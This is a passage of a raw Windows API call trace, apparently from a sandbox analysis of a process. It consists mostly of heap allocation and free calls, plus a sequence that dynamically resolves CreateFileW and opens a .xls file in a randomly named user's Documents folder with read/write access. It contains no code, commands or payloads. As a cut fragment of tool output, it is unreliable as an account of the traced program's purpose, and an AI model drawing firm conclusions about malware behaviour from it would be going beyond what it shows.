Flags=0x0, Size=0x20) returned 0x8decb8 [0173.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0173.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0173.980] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0173.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0173.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0173.980] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0173.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0173.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0173.980] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0173.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0173.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0173.981] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0173.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0173.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0173.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0173.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0173.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0173.981] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0173.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0173.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0173.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0173.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0173.981] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0173.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0173.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0173.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba498 [0173.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba498, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0173.982] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mv3nzu4vwv4hc.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0173.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0173.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0173.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0173.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0173.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0173.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0173.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0173.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0173.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0173.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0173.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0173.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0173.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0173.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0173.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0173.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6ee28 | out: hHeap=0x8a0000) returned 1 [0173.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0173.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0173.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0173.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0173.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0173.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0173.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0173.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0173.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0173.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0173.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0173.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0173.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0173.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0173.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0173.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0173.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0173.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0173.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0173.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0173.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0173.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0173.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0173.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0173.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0173.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0173.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0173.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0173.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0173.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0173.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0173.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0173.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0173.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0173.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0173.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0173.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0173.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0173.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0173.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0173.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0173.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0173.984] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0173.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0173.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0173.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0173.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0173.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0173.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.986] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0173.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0173.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0173.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0173.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0173.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0173.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0173.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0173.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.986] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0173.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0173.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0173.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 